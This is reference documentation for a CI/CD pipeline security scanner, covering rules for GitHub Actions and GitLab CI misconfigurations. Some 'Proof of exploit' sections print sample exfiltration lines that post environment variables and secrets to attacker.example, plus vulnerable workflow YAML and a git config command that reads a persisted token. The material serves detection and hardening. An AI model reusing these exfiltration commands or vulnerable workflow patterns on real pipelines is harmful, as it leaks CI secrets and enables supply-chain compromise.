How this is detected. GHA-012 catches self-hosted runners that aren't ephemeral; this rule catches the upstream targeting choice. When runs-on is computed from an untrusted expression, the caller picks where the workflow runs, including any self-hosted label the org owns. A reusable workflow that declares runs-on: ${{ inputs.runner }} lets a downstream caller route the job onto the production-deploy fleet (or any other privileged label) and execute arbitrary code with the privileges that fleet inherits. The same surface exists via workflow_dispatch inputs and any ${{ github.event.* }} field that an attacker can populate. The rule walks all three runs-on shapes, string scalar, list of labels, and the long-form { group, labels } dict, and matches the same untrusted-context regex GHA-003 / GHA-035 use.

Recommendation. Hard-code runs-on: to a specific runner label or list of labels. If the choice has to be parameterised across callers, validate the input against an allowlist of known-good labels before the job runs (a small if: guard at job level), and never accept ${{ inputs.* }} or any ${{ github.event.* }} field as the runs-on value directly.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Workflows that intentionally select runners by environment via a vetted matrix (runs-on: ${{ matrix.os }} where matrix.os is a hard-coded list inside the workflow) are out of scope, the matrix values are author-controlled, not caller-controlled. The rule only matches the catalog of untrusted contexts (inputs.*, github.event.*, github.head_ref, …); matrix.* and env.* references are intentionally not flagged.

Source: GHA-036 in the GitHub Actions provider.

GHA-037: actions/checkout persists GITHUB_TOKEN into .git/config HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution, CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Detection fires on any step whose uses: starts with actions/checkout@ and whose with: block either omits persist-credentials (the unsafe default) or sets it to true explicitly.

This is the failure pattern Zizmor calls Artipacked and the StepSecurity / harden-runner audit set tracks as persist-credentials-default. Real-world exploit chains (the ultralytics 2024 RCE, multiple Mend / Snyk advisories) exploit exactly this primitive: a first checkout step persists the token, a later run: step (often a build script the attacker can influence via PR contents) reads .git/config and ships the token out.

Sister rule: GHA-019 catches the explicit echo $GITHUB_TOKEN > file shape; GHA-037 catches the implicit checkout-default that doesn't go through a run: line at all.

Recommendation. Set persist-credentials: false on every actions/checkout step that doesn't need to push back to the repo. The default in v3 / v4 is true, which writes the GITHUB_TOKEN into .git/config as an http.https://github.com/.extraheader line. Any subsequent run: step in the same job can read it with git config --get http.https://github.com/.extraheader and exfiltrate the token to a remote endpoint, even if that step's own scope is read-only. If the workflow genuinely needs to push (release publishing, doc-site deploys), do the push as the very next step and immediately follow with a checkout that sets persist-credentials: false so the token doesn't leak into later, less-trusted steps.

Known false positives.

  • Workflows that genuinely need persist-credentials: true to push back to the repo (a release-tag bot, a docs-deploy job, stefanzweifel/git-auto-commit-action) shouldn't suppress this rule globally; instead, scope persist-credentials: true to a named step, then run the push immediately, then use a fresh actions/checkout with persist-credentials: false so the token doesn't leak into later steps. Suppress on the specific step name only when the scoped pattern is in place.

Source: GHA-037 in the GitHub Actions provider.

GHA-038: Workflow re-enables retired ::set-env / ::add-path commands CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution, CICD-SEC-7 Insecure System Configuration.

How this is detected. Detection fires when ACTIONS_ALLOW_UNSECURE_COMMANDS is set to any truthy value at the workflow env: level, the job env: level, or any step's env: block. Accepted truthy spellings: true / 1 / yes / on (including quoted forms like "true" and case-insensitive variants like YES / On).

Sister rule GHA-031 catches direct uses of ::set-output:: / ::save-state:: in step scripts. GHA-038 catches the explicit re-enable flag, which is the strictly worse case: it implicitly accepts every ::set-env:: / ::add-path:: line that lands on the runner's stdout from any tool the step invokes, not just the workflow author's own echo commands. A downloaded build log, a container's startup banner, an upstream test runner's output, all become injection vectors.

Recommendation. Drop the ACTIONS_ALLOW_UNSECURE_COMMANDS env definition entirely, then migrate any leftover ::set-env:: / ::add-path:: workflow commands to the file-redirect form (echo "X=$VAL" >> "$GITHUB_ENV" and echo "$DIR" >> "$GITHUB_PATH"). GitHub disabled the legacy commands in 2020 specifically because they share the runner's stdout as a control channel: any log line starting with :: could inject environment variables, prepend to PATH, or set step outputs. Setting the override flag back to true re-opens that injection channel for the entire workflow scope.

Known false positives.

  • Some legacy actions (last-updated pre-2020) still emit ::set-env:: lines and rely on the override to be set. Replace the action rather than suppressing this rule, the security exposure outweighs the cost of an alternative action.

Source: GHA-038 in the GitHub Actions provider.

GHA-039: services / container credentials embedded as literal in workflow CRITICAL

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. GitHub Actions accepts a credentials: map on both the job-level container: block (the runner image) and on each services.<name>: entry (sidecar containers). The map is the documented way to pull a private image from a registry that requires auth, and it expects ${{ secrets.* }} references for both fields.

GHA-008 scans the workflow for credential patterns (AWS access keys, JWTs, Slack tokens, etc.) but doesn't trip on a plain password like hunter2 or a registry username like ci-deploy-bot. GHA-039 catches them by position: any literal value in a credentials.username / credentials.password field is by definition a leaked credential, regardless of its shape. Closes parity with Zizmor's hardcoded-container-credentials rule.

Recommendation. Move every services.<name>.credentials.username / credentials.password value (and the same field on a job-level container: block) out of the workflow YAML and into a repository or environment secret. Reference the secret via ${{ secrets.NAME }} from the same credentials block. Anything written as a literal is permanently visible in every fork of the repo, every build log that prints the runner's start banner, and every cached job summary, so the credential must be treated as compromised on the spot. The fix is the rotation, plus the secret reference, plus a check that no other workflow keeps the literal pattern.

Known false positives.

  • Workflows that legitimately use a public anonymous registry mirror occasionally hardcode username: anonymous / password: "" for clarity. Both shapes are filtered out automatically (empty / whitespace-only values, plus the literal anonymous username), but if your fixture uses another sentinel for anonymous access, suppress the specific job/service in the ignore-file rather than the rule globally.

Source: GHA-039 in the GitHub Actions provider.

GHA-040: Action reference matches a known-compromised SHA or tag CRITICAL

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Walks every workflow's steps[].uses: and jobs.<id>.uses: references against the curated compromised-action registry in pipeline_check.core.checks.github._compromised_actions. Match is case-insensitive on owner / repo and exact on the ref value (commit SHA or tag name). Registry is deliberately small and append-only — refresh by PR with the citing advisory in the commit message; no fetch-from-network registry to avoid taking on a telemetry surface.

Recommendation. Rotate every secret that may have been reachable to a workflow run that hit the compromised reference, then update the uses: reference to a known-clean SHA published by the upstream maintainer post-incident (usually announced in the advisory body). Audit CI logs for the affected window for any sign that the malicious payload ran against this repo.

Known false positives.

  • The registry covers only public, advisory-confirmed compromises. Pre-disclosure compromises and yet-unpublished maintainer-account takeovers do not land until the citing CVE / GHSA exists. Pair with GHA-001 (SHA pinning) and GHA-025 (tag-rewrite detection) for the prevention angle.

Seen in the wild.

  • tj-actions/changed-files compromise (CVE-2025-30066, March 2025): the canonical case the registry was built for. Roughly 23,000 tag-pinned repos shipped CI secrets to an exfiltration endpoint over a ~24-hour window before GitHub blocked the malicious commits.
  • reviewdog/action-setup compromise (CVE-2025-30154, March 2025): same week as tj-actions; smaller blast radius but identical mechanism. Tag-pinned consumers were affected; SHA-pinned consumers who happened to match the malicious commit were also affected.

Proof of exploit.

Vulnerable: pinned to a SHA the attacker landed under @v45.

Same applies to tag pins that resolved to the malicious

commit during the compromise window:

  • uses: tj-actions/changed-files@v45 # WAS pointing at the bad commit

Attack: the action body exfiltrated CI secrets to a

Memdump-style endpoint:

# curl -X POST https://attacker.example/exfil \

-d "$(cat /proc/self/environ)"

Every workflow run that hit one of those refs over the

~24-hour exposure window leaked the entire env block,

including ${{ secrets.* }} and GITHUB_TOKEN.

Safe: pin to the post-incident clean SHA the maintainer

published in the advisory:

Source: GHA-040 in the GitHub Actions provider.

GHA-041: Action upstream repo has a single contributor MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Reads the contributor count from ctx.action_metadata[owner/repo].contributor_count (populated by the --resolve-remote path; the GitHub REST /contributors endpoint, capped at two entries — the rule only cares about == 1). When the fetch failed or the flag is off, the rule passes silently. Forks and archived repos that ALSO have a single contributor fire the rule; the fork / archived state is part of the same supply-chain risk story.

Recommendation. Audit the action repo's contributor list. If the repo genuinely has one maintainer, pin to a vendored fork under your org's control (so a future compromise on the upstream doesn't reach your build runtime) or move to a first-party action covering the same surface. The single-maintainer pattern is what made tj-actions / reviewdog one-day compromises so widely-blast.

Known false positives.

  • Some well-maintained single-author actions (high-quality personal-account repos that the maintainer simply hasn't open-sourced governance for) are not actually compromised. Suppress via ignore-file when a security review has confirmed the maintainer's identity and 2FA posture.

Seen in the wild.

  • tj-actions / reviewdog March 2025 compromises (CVE-2025-30066 / CVE-2025-30154): both upstream repos had a single primary contributor at the time of compromise. The single-maintainer pattern was central to the blast radius (no second pair of eyes on the malicious commit, no auto-rollback when the tag move landed).

Source: GHA-041 in the GitHub Actions provider.

GHA-042: Action upstream repo is newly created MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Reads created_at from ctx.action_metadata[owner/repo] (populated by the --resolve-remote path). Fires when the repo's age in days is below MIN_AGE_DAYS (90). Without the opt-in flag the rule passes silently with a nudge.

Recommendation. Verify the action repo is the real upstream and not a typosquat. Compare the spelling and owner against the intended action (actions/checkout vs actoins/checkout); check the repo description, stars, and prior releases. If the action is genuinely new but trusted, suppress via ignore-file with a dated note; the suppression decays naturally as the repo ages past the 90-day threshold.

Known false positives.

  • Newly-released first-party actions from a trusted org (say, a freshly-launched actions/foo rolled out by GitHub itself) fire while they're still young. Suppress via ignore-file with a dated note; the entry expires naturally once the repo crosses the age threshold.

Seen in the wild.

  • GitGuardian / StepSecurity typosquat reports (2023-2024) document several action-naming impersonations that appeared as newly-registered repos and reached production CI before the legitimate owner was notified.

Source: GHA-042 in the GitHub Actions provider.

GHA-043: Low-star action runs with sensitive permissions HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-5 Insufficient PBAC.

How this is detected. Reads stargazers_count from ctx.action_metadata[owner/repo] and the effective permissions: block (job-level wins; falls back to workflow-top-level; falls back to the caller's inherited block for resolved reusable workflows). Fires when stars < MAX_STARS (25) AND any of 'contents', 'packages', 'id-token', 'actions', 'deployments' is set to write on the calling job. permissions: write-all is treated as all scopes set to write.

Recommendation. Either narrow the calling job's permissions: to the minimum the action actually needs (drop contents: write / id-token: write / packages: write / actions: write / deployments: write unless the action's documented surface requires them), or replace the action with a community-reviewed alternative. The rule fires the COMBINATION of low community review and elevated permissions; either side alone is fine.

Known false positives.

  • Internal first-party actions hosted in a private org repo legitimately have low public star counts; their threat model is different and the rule does not distinguish internal from third-party. Suppress via ignore-file when the action is in-org and trusted.

Seen in the wild.

  • GitGuardian 2023 supply-chain audit: a handful of low-popularity actions with contents: write were weaponized via single-PR maintainer-impersonation compromises; the elevated permission was the privilege amplifier that let the attacker push code back to the victim's default branch on the same workflow run.

Source: GHA-043 in the GitHub Actions provider.

GHA-044: Build tool runs lifecycle scripts on untrusted-trigger workflow HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Package managers and build tools execute code by design. npm install runs preinstall / install / postinstall from the PR's package.json; pip install . runs the PR's setup.py; make runs the PR's Makefile; mvn / gradle load plugins declared in the PR's pom.xml / build.gradle; cargo build runs build.rs. Under pull_request_target / workflow_run, the surrounding context already has secrets and a write-scope token, so the lifecycle hook is the entire attack.

Recommendation. Don't run install / build commands under pull_request_target or workflow_run against a tree that may be PR-controlled. Split the workflow: keep the privileged work on push / release (no fork content), and run untrusted builds in a separate pull_request workflow with no secrets and a read-only GITHUB_TOKEN. If you must build PR code with secrets, do it inside a container with no network egress and a minimal filesystem, never directly on the runner.

Known false positives.

  • Workflows that pin the workspace to a trusted ref before invoking the build tool (actions/checkout with no ref: override on pull_request_target, or a fresh checkout of a default-branch SHA) aren't actually exposed. The rule fires on the build-tool invocation alone; suppress with a .pipelinecheckignore rationale when the workspace is provably clean.

Seen in the wild.

  • Trail of Bits Public PPE write-up (2022): demonstrated the primitive against pull_request_target workflows that ran npm install after checking out PR content. The PR-supplied preinstall script ran with the base repo's secrets in scope. Same shape with pip install -e . (setup.py) and make (Makefile).
  • Cycode / Legit Security Poisoned Pipeline Execution research (2022-2023) catalogued dozens of OSS repos where a privileged-trigger workflow's build step executed PR-controlled config: setup.py's cmdclass, build.gradle's init.gradle, pom.xml's <build><plugins>. The fix pattern is always: don't build untrusted code with secrets in scope.

Proof of exploit.

Vulnerable: pull_request_target + npm install.

name: pr-build on: pull_request_target: types: [opened, synchronize] jobs: build: runs-on: ubuntu-latest steps: - uses: actions/checkout@ with: ref: ${{ github.event.pull_request.head.sha }} - run: npm install # executes package.json scripts

Attack: PR ships a tampered package.json with:

"scripts": {

# "preinstall": "curl -X POST https://attacker.example/x \

-d \"$(env | base64 -w0)\""

}

npm install runs preinstall before resolving any

dependency, so the exfil fires the moment the workflow

starts. Same shape with pip install -e . (runs setup.py),

make (runs Makefile), mvn (runs pom.xml plugins), gradle

(runs init scripts), cargo build (runs build.rs).

Safe: split the workflow. Privileged labeler runs on

pull_request_target with secrets but never installs the

PR. The build runs on pull_request with no secrets:

name: build on: { pull_request: {} } jobs: build: runs-on: ubuntu-latest steps: - uses: actions/checkout@ - run: npm install # no secrets in scope

Source: GHA-044 in the GitHub Actions provider.

GHA-045: Caller-controlled ref input feeds actions/checkout HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. workflow_dispatch / workflow_call inputs land in ${{ inputs.<name> }}. Feeding that directly into the ref: of actions/checkout means the caller picks which commit runs in this workflow's privileged context (secrets, GITHUB_TOKEN, environment approvals already satisfied). The callee can't tell whether the ref points at a vetted branch, a private fork's tip, or an attacker-controlled SHA. The rule fires on ref: values whose expression resolves to an inputs.* reference, walking any ${{ ... }} expression that names an input field.

Recommendation. Validate the ref input against an allow-list (a regex for refs/heads/release-*, an explicit set of permitted tags, or a 40-char SHA match) BEFORE passing it to actions/checkout. If the workflow only needs to build release tags, hard-code the ref or derive it from github.event.release.tag_name (still attacker-influenced, but at least scoped to a release event). For reusable workflows, document that the callee assumes callers have already validated the ref, and pin every caller to a known list of refs.

Known false positives.

  • Reusable workflows that ARE the trust boundary (the callee is documented as the authoritative checkout entrypoint and every caller is internal / pinned by SHA) accept this shape by design. The rule still surfaces these so the author can document the contract in a .pipelinecheckignore rationale; suppress with the caller-list cite.

Seen in the wild.

  • Snyk GitHub Actions abuse via workflow_dispatch research (2023) showed reusable build workflows that accepted a ref input and checked it out without validation. An attacker with workflow_dispatch permission (commonly granted to broader sets of actors than push) pointed the checkout at a fork SHA and exfiltrated the production deploy credentials.

Proof of exploit.

Vulnerable: caller picks the ref.

name: build-release on: workflow_dispatch: inputs: ref: description: 'Tag or branch to build' required: true jobs: build: runs-on: ubuntu-latest steps: - uses: actions/checkout@ with: ref: ${{ inputs.ref }} # caller controls - run: make release env: SIGNING_KEY: ${{ secrets.RELEASE_SIGNING_KEY }}

Attack: any actor with workflow_dispatch permission opens

the API and dispatches with ref: refs/pull/123/head (a

fork PR). The privileged workflow checks out the attacker-

controlled tree and runs make release with the signing

key in scope. No code review, no PR merge — one API call.

Safe: validate the ref before use.

  - name: Validate ref
    run: |
      case "$REF" in
        refs/tags/v*) ;;
        *) echo "refusing $REF"; exit 1 ;;
      esac
    env:
      REF: ${{ inputs.ref }}
  - uses: actions/checkout@<sha>
    with:
      ref: ${{ inputs.ref }}

Source: GHA-045 in the GitHub Actions provider.

GHA-046: Manual PR-head fetch on untrusted-trigger workflow CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. GHA-002 catches actions/checkout with ref: ${{ github.event.pull_request.head.sha }}. The same primitive shows up as gh pr checkout, git fetch origin pull/<N>/head, and git checkout of an attacker-controlled SHA expression inside a run: block. They all land the same bytes in the workspace with the same privileged context active, so they get the same severity.

Recommendation. Don't materialize the PR head in a pull_request_target or workflow_run job. If you need to inspect PR content, split the workflow: a privileged half (with secrets) that uses metadata only (PR number, base ref, label) and an unprivileged pull_request half that builds the code with no secrets in scope.

Seen in the wild.

  • GitHub Security Lab: Preventing pwn requests (2020) listed manual git fetch pull/<N>/head as one of the equivalent ways teams shoot themselves in the foot. Auditors checking only actions/checkout miss the shell-level variants entirely.

Proof of exploit.

Vulnerable: pull_request_target + gh pr checkout.

name: triage on: pull_request_target: types: [opened, synchronize] jobs: test-pr: runs-on: ubuntu-latest steps: - uses: actions/checkout@ # base, looks safe - run: gh pr checkout ${{ github.event.number }} env: GH_TOKEN: ${{ github.token }} - run: make test # now runs PR Makefile

Attack: same as GHA-002. The PR ships a Makefile that

exfils $GITHUB_TOKEN and every ${{ secrets.* }} the

pull_request_target context exposes. GHA-002's pattern

match never fires because actions/checkout looks

innocent, the PR content lands via the shell instead.

Safe: don't materialize PR content with secrets active.

Move the build to a pull_request workflow:

name: build on: { pull_request: {} } jobs: test-pr: runs-on: ubuntu-latest steps: - uses: actions/checkout@ # PR head, no secrets - run: make test

Source: GHA-046 in the GitHub Actions provider.

GHA-047: Action ref resolves to a recently committed tag or SHA MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-8 Ungoverned Usage of 3rd-Party Services.

How this is detected. Reads ref_committed_at from ctx.action_metadata[owner/repo] (populated by the --resolve-remote path via GET /repos/{owner}/{repo}/commits/{ref}). Fires when the referenced ref's commit date is younger than MIN_REF_AGE_DAYS (7). Trusted publishers (actions, aws-actions, azure, ...) are skipped by default to avoid firing on legitimate retags of floating majors; pin to a SHA to opt those back in. Without --resolve-remote the rule passes silently with a discovery nudge.

Recommendation. Wait until the referenced tag or commit has had time to be reviewed by the upstream community before pulling it into CI. The default cooldown is seven days. Either bump the pinned ref to an older release, or wait 7 days and re-run. If the action is internal / first-party and the freshness gate is unwanted, pin to a 40-char commit SHA — SHA pins don't move under a retag and are the preferred long-term mitigation.

Known false positives.

  • A legitimate first-party action that's outside the default trusted-publisher allowlist (a small vendor org that publishes a real action; you'd like it included) will fire after every release for the cooldown window. Either pin to a SHA (preferred) or suppress via ignore-file with a dated note; the suppression decays once the ref ages past the threshold.

Seen in the wild.

  • Multiple action-tag compromises (ua-parser-js npm 2021, tj-actions/changed-files 2024) followed the same shape: a tag was re-pointed at a malicious commit and consumers pulling on the next CI run executed the payload. Cooldown gating turns the community-detection window into a defense.

Source: GHA-047 in the GitHub Actions provider.

GL-001: Image not pinned to specific version or digest HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Floating tags (latest or major-only) can be silently swapped under the job. Every image: reference should pin a specific version tag or digest.

Recommendation. Reference images by @sha256:<digest> or at minimum a full immutable version tag (e.g. python:3.12.1-slim). Avoid :latest and bare tags like :3.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GL-001 in the GitLab CI provider.

GL-002: Script injection via untrusted commit/MR context HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. CI_COMMIT_MESSAGE / CI_COMMIT_REF_NAME / CI_MERGE_REQUEST_TITLE and friends are populated from SCM event metadata the attacker controls. Interpolating them into a shell body executes the crafted content as part of the build.

Recommendation. Read these values into intermediate variables: entries or shell variables and quote them defensively ("$BRANCH"). Never inline $CI_COMMIT_MESSAGE / $CI_MERGE_REQUEST_TITLE into a shell command.

Source: GL-002 in the GitLab CI provider.

GL-003: Variables contain literal secret values CRITICAL

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Scans variables: at the top level and on each job for entries whose KEY looks credential-shaped and whose VALUE is a literal string (not a $VAR reference). AWS access keys are detected by value pattern regardless of key name.

Recommendation. Store credentials as protected + masked CI/CD variables in project or group settings, and reference them by name from the YAML. For cloud access prefer short-lived OIDC tokens.

Source: GL-003 in the GitLab CI provider.

GL-004: Deploy job lacks manual approval or environment gate MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. A job whose stage or name contains deploy / release / publish / promote should either require manual approval or declare an environment: binding. Otherwise any push to the trigger branch ships to the target.

Recommendation. Add when: manual (optionally with rules: for protected branches) or bind the job to an environment: with a deployment tier so approvals and audit are enforced by GitLab's environment controls.

Source: GL-004 in the GitLab CI provider.

GL-005: include: pulls remote / project without pinned ref HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Cross-project and remote includes can be silently re-pointed. Branch-name refs (main/master/develop/head) are treated as unpinned; tag and SHA refs are considered safe.

Recommendation. Pin include: project: entries with ref: set to a tag or commit SHA. Avoid include: remote: for untrusted URLs; mirror the content into a trusted project and pin it.

Source: GL-005 in the GitLab CI provider.

GL-006: Artifacts not signed MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Unsigned artifacts can't be verified downstream, so a tampered build is indistinguishable from a legitimate one. Pass when any of cosign / sigstore / slsa-* / notation-sign appears in the pipeline text.

Recommendation. Add a job that runs cosign sign (keyless OIDC with GitLab's id_tokens works out of the box) or notation sign. Publish the signature next to the artifact and verify it on consume.

Source: GL-006 in the GitLab CI provider.

GL-007: SBOM not produced MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Without an SBOM, downstream consumers can't audit the dependency set shipped in the artifact. Passes when CycloneDX / syft / anchore / spdx-sbom-generator / sbom-tool / Trivy-SBOM appears in the pipeline body.

Recommendation. Add an SBOM step, syft . -o cyclonedx-json, Trivy with --format cyclonedx, or GitLab's built-in CycloneDX dependency-scanning template. Attach the SBOM as a pipeline artifact.

Source: GL-007 in the GitLab CI provider.

GL-008: Credential-shaped literal in pipeline body CRITICAL 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Complements GL-003 (which looks at variables: block keys). GL-008 scans every string in the pipeline against the cross-provider credential-pattern catalog, catches secrets pasted into script: bodies or environment blocks where the name-based detector can't see them.

Recommendation. Rotate the exposed credential immediately. Move the value to a protected + masked CI/CD variable and reference it by name. For cloud access prefer short-lived OIDC tokens.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example AKIAIOSFODNN7EXAMPLE is deliberately NOT suppressed, if it appears in a real pipeline it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.

Source: GL-008 in the GitLab CI provider.

GL-009: Image pinned to version tag rather than sha256 digest LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. GL-001 fails floating tags at HIGH; GL-009 is the stricter tier. Even immutable-looking version tags (python:3.12.1) can be repointed by registry operators. Digest pins are the only tamper-evident form.

Recommendation. Resolve each image to its current digest (docker buildx imagetools inspect <ref> prints it) and replace the tag with @sha256:<digest>. Automate refreshes with Renovate.

Source: GL-009 in the GitLab CI provider.

GL-010: Multi-project pipeline ingests upstream artifact unverified CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. needs: { project: ..., artifacts: true } pulls artifacts from another project's pipeline. If that upstream project accepts MR pipelines, the artifact may have been built by attacker-controlled code.

Recommendation. Add a verification step before consuming the artifact: cosign verify-attestation, sha256sum -c, or gpg --verify against a manifest signed by the upstream project's release key. Only consume artifacts produced by upstream pipelines whose origin you can trust.

Source: GL-010 in the GitLab CI provider.

GL-011: include: local file pulled in MR-triggered pipeline HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. include: local: '<path>' resolves from the current pipeline's checked-out tree. On an MR pipeline the tree is the MR source branch, the MR author controls the included YAML content.

Recommendation. Move the included template into a separate, read-only project and reference it via include: project: ... ref: <sha-or-tag>. That way the included content is fixed at MR creation time and not editable from the MR branch.

Source: GL-011 in the GitLab CI provider.

GL-012: Cache key derives from MR-controlled CI variable MEDIUM

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. GitLab caches restore by key prefix. When the key includes an MR-controlled variable, an attacker can poison a cache entry that a later default-branch pipeline restores.

Recommendation. Build the cache key from values the MR can't control: lockfile contents (files: [Cargo.lock]), the job name, and $CI_PROJECT_NAMESPACE. Never reference $CI_MERGE_REQUEST_* or $CI_COMMIT_BRANCH from a cache key namespace.

Source: GL-012 in the GitLab CI provider.

GL-013: AWS auth uses long-lived access keys MEDIUM 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Long-lived AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY values in CI/CD variables can't be rotated on a fine-grained schedule. GitLab supports OIDC via id_tokens: for short-lived credential injection.

Recommendation. Use GitLab CI/CD OIDC with id_tokens: to obtain short-lived AWS credentials via sts:AssumeRoleWithWebIdentity. Remove static AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY from CI/CD variables.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GL-013 in the GitLab CI provider.

GL-014: Self-managed runner without ephemeral tag MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Self-managed runners that don't tear down between jobs leak filesystem and process state. The check looks for an ephemeral tag on any job whose tags: list doesn't match SaaS-only runner names.

Recommendation. Register the runner with --executor docker + --docker-pull-policy always so containers are fresh per job, and add an ephemeral tag. Alternatively use the GitLab Runner Operator with autoscaling.

Source: GL-014 in the GitLab CI provider.

GL-015: Job has no timeout, unbounded build MEDIUM 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Without an explicit timeout, the job runs until the instance-level default (typically 60 minutes). Explicit timeouts cap blast radius and the window during which a compromised script has access to CI/CD variables.

Recommendation. Add timeout: to each job (e.g. timeout: 30 minutes), sized to the 95th percentile of historical runtime. GitLab's default is 60 minutes (or the instance admin setting).

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GL-015 in the GitLab CI provider.

GL-016: Remote script piped to shell interpreter HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a pipeline. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the CI runner.

Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit.

Source: GL-016 in the GitLab CI provider.

GL-017: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a pipeline give the container full access to the CI runner, enabling container escape and lateral movement.

Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GL-017 in the GitLab CI provider.

GL-018: Package install from insecure source HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects package-manager invocations that use plain HTTP registries (--index-url http://, --registry=http://) or disable TLS verification (--trusted-host, --no-verify) in a pipeline. These patterns allow man-in-the-middle injection of malicious packages.

Recommendation. Use HTTPS registry URLs. Remove --trusted-host and --no-verify flags. Pin to a private registry with TLS.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GL-018 in the GitLab CI provider.

GL-019: No vulnerability scanning step MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck.

Recommendation. Add a vulnerability scanning step, trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.

Source: GL-019 in the GitLab CI provider.

GL-020: CI_JOB_TOKEN written to persistent storage CRITICAL 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Detects patterns where CI_JOB_TOKEN is redirected to a file, piped through tee, or appended to dotenv/artifact paths. Persisted tokens survive the job boundary and can be read by later stages, downloaded artifacts, or cache entries, turning a scoped credential into a long-lived one.

Recommendation. Never write CI_JOB_TOKEN to files, artifacts, or dotenv reports. Use the token inline in the command that needs it and let GitLab revoke it automatically when the job finishes.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GL-020 in the GitLab CI provider.

GL-021: Package install without lockfile enforcement MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects package-manager install commands that do not enforce a lockfile or hash verification. Without lockfile enforcement the resolver pulls whatever version is currently latest, exactly the window a supply-chain attacker exploits.

Recommendation. Use lockfile-enforcing install commands: npm ci instead of npm install, pip install --require-hashes -r requirements.txt, yarn install --frozen-lockfile, bundle install --frozen, and go install tool@v1.2.3.

